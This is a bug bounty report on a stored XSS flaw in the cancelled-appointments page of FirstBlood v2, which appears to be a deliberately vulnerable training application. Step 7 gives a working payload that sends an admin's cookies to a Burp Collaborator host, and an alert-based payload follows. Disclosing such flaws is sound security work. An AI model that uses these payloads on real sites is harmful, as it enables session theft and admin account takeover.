FirstBlood-#812Stored XSS on cancelled appointment can leak admin cookies
This issue was discovered on FirstBlood v2



On 2021-10-28, xnl-h4ck3r Level 4 reported:

Summary

A stored XSS vulnerability exists on /drpanel/cancelled.php that allows an attacker to make an appointment and then cancel the appointment providing an XSS payload in the message parameter that will fire when an Admin user visits the /drpanel/cancelled.php.

Steps to reproduce

  1. Go to /book-appointment.php and enter any details to book a new appointment, .e.g in the name of Xnl Xss

  2. Make a note of the of the ApointmentID displayed on the screen, e.g:

  3. Go to /yourappointments.php and enter the Appointment ID from Step 2 and click RETRIEVE APPOINMENT.

  4. Proxy requests through Burp, and turn Intercept on.

  5. Open Burp Collaborator and copy the URL

  6. Click the CANCEL APPOINTMENT button and go to Burps Proxy/Intercept tab.

  7. In the request, add the payload &"><style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="window.location.href='http://qd7awkqekdw953ne15olcyr05rbhz6.burpcollaborator.net?c='%2bdocument.cookie"> and turn Intercept off again to send the request.

  8. Now log into the site as an Admin user and visit /drpanel/cancelled.php. Observe the request is redirected to Burp collaborator URL that contains the admins cookies:

Impact

An attacker can make an appointment, and cancel the appointment providing a stored XSS payload. If an admin user visits the /drpanel/cancelled.php the admins cookies can be leaked to the attacker and allow the attacker to take over the admin account.

P2 High

Endpoint: /drpanel/cancelled.php

Parameter: message

Payload: "%09onfocus=alert(document.cookie)%0a


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.